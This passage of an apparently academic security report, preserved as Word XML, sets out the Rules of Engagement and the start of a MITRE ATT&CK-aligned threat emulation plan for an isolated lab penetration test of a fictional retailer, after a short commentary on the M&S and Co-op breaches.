        <w:t>The M&amp;S and Co-op campaign shows that the most severe current breaches are about trust and process, not arcane code. One social-engineering call, made possible by poor identity hardening and flat confidence in networks, created hundreds of millions of pounds’ worth of influence. The strategic takeaway is that the centre of gravity for offensive security has moved to identity: businesses that cannot authenticate who is phoning their help desk, cannot detect a misused credential and cannot control lateral movement will continue to be exposed regardless of their perimeter spend.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[2]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0853F758" w14:textId="74F42E33" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3 · Task 2 — Red Team Engagement: ABCD Ltd Penetration Test</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="750D971B" w14:textId="77777777" w:rsidR="00950431" w:rsidRPr="00796916" w:rsidRDefault="00950431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Task 2 is a staged attack against ABCD Ltd, a fictional mid-sized UK shop with web-facing and internal corporate systems, using the knowledge from Task 1. We deliver the engagement as a complete package: Rules of Engagement, a threat-emulation plan aligned to MITRE ATT&amp;CK, a three-VM lab design, three different exploits forming an end-to-end chain, tools and techniques justification, operational execution with evidence, containment/safety assurances — then a technical report with detection-gap analysis and a board-level executive brief.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDC4AD3" w14:textId="77777777" w:rsidR="00950431" w:rsidRPr="00796916" w:rsidRDefault="00950431">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc234776720"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Supposition. All target PCs are allowed to use intentionally-vulnerable images from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>VulnHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, deployed in an isolated virtual network. Third party or production system is out of scope. The engagement goal is stated as exfiltration of a sample customer database record, and capture of privileged domain credentials, indicating an end-to-end chain from external web compromise to internal data access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429D75A6" w14:textId="59408D28" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.1 Rules of Engagement (R</w:t>
      </w:r>
      <w:r w:rsidR="00950431" w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>E)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="2A978B4D" w14:textId="77777777" w:rsidR="00950431" w:rsidRPr="00796916" w:rsidRDefault="00950431">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc234776721"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Rules of Engagement establish the scope and bounds of the test and are the contractual and ethical basis for any action. This document is signed by the client’s authorized representative and the lead tester before any activity is started, in a live engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690E8FFE" w14:textId="7BB35A2E" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Scope — In Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="7D7584B5" w14:textId="20711ADA" w:rsidR="00950431" w:rsidRPr="00796916" w:rsidRDefault="00950431">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Three isolated laboratory virtual machines (VM-1, VM-2, VM-3) solely on the private lab subnet as defined in §3.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0979C670" w14:textId="77777777" w:rsidR="00950431" w:rsidRPr="00796916" w:rsidRDefault="00950431">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Web application on VM-2 and its supporting services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A56229" w14:textId="77777777" w:rsidR="00950431" w:rsidRPr="00796916" w:rsidRDefault="00950431" w:rsidP="00950431">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc234776722"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Client host VM-3 and simulated Active Directory domain on VM-1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9CCAE1" w14:textId="2381123D" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Scope — Explicitly Excluded</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="29200DE1" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Any host, network or service outside the isolated lab subnet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D6DD9D" w14:textId="77777777" w:rsidR="00FD1BF0" w:rsidRPr="00796916" w:rsidRDefault="00FD1BF0" w:rsidP="00FD1BF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Denial of service or destructive activities against data (encryption/deletion) other than a single proof of concept marker file.</w:t>
      </w:r>
      <w:bookmarkStart w:id="15" w:name="_Toc234776723"/>
    </w:p>
    <w:p w14:paraId="3C1115BD" w14:textId="70318C0E" w:rsidR="00FD1BF0" w:rsidRPr="00796916" w:rsidRDefault="00FD1BF0" w:rsidP="00FD1BF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Real people social engineering, all “human” phases are simulated in the lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EF1FF7" w14:textId="77777777" w:rsidR="00FD1BF0" w:rsidRPr="00796916" w:rsidRDefault="00FD1BF0" w:rsidP="00FD1BF0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52B694A9" w14:textId="058F7159" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000" w:rsidP="00FD1BF0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Permitted Techniques</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="2FB9A272" w14:textId="77777777" w:rsidR="001535C9" w:rsidRPr="00796916" w:rsidRDefault="001535C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Network and service enumeration, finding vulnerabilities and controlled exploitation of the three disclosed vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40814527" w14:textId="422A5B6D" w:rsidR="001535C9" w:rsidRPr="00796916" w:rsidRDefault="001535C9" w:rsidP="001535C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Privilege escalation, lateral movement and credential access within the lab domain</w:t>
      </w:r>
      <w:bookmarkStart w:id="16" w:name="_Toc234776724"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E014932" w14:textId="2190917E" w:rsidR="001535C9" w:rsidRPr="00796916" w:rsidRDefault="001535C9" w:rsidP="001535C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stealth demonstration via command-and-control simulation and living-off-the-land techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6616CC62" w14:textId="77777777" w:rsidR="001535C9" w:rsidRPr="00796916" w:rsidRDefault="001535C9" w:rsidP="001535C9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E37EC8D" w14:textId="6E75F33C" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Safety, Communication and Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="6CBAC346" w14:textId="77777777" w:rsidR="001535C9" w:rsidRPr="00796916" w:rsidRDefault="001535C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Safe-word / kill switch: The phrase “ABORT-LAB” (and returning to a pre-engagement snapshot) immediately halts all activity. The kill switch is triggered by pausing the attacker VM and restoring snapshots, as the lab is isolated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4921C762" w14:textId="77777777" w:rsidR="001535C9" w:rsidRPr="00796916" w:rsidRDefault="001535C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Communication: recording results in real time; unforeseen instability leads to immediate stop and snapshot restore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123C03B6" w14:textId="77777777" w:rsidR="001535C9" w:rsidRPr="00796916" w:rsidRDefault="001535C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc234776725"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Legal / ethical constraints: All activity is performed on owned, separated infrastructure, in line with the UK Computer Misuse Act 1990 – we never access any unauthorised systems. This report does not release any weaponized payloads.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId43">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[10]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5632D5E2" w14:textId="6D0920CB" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.2 Threat Emulation Plan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="7744308A" w14:textId="01275BC8" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001535C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The simulation simulates a Scattered-Spider type financially driven intrusion in a lab environment: get a web foothold, escalate and transfer to the internal domain, and reach critical customer data. The plan is aligned to MITRE ATT&amp;CK and sets success criteria for each phase.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1555"/>
        <w:gridCol w:w="3293"/>
        <w:gridCol w:w="951"/>
        <w:gridCol w:w="3561"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="07A6ABDA" w14:textId="77777777" w:rsidTr="0008259B">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0E071E7D" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3293" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="42295ABB" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="951" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="478A900D" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="29C50D94" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Success criterion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="55E1B36A" w14:textId="77777777" w:rsidTr="0008259B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
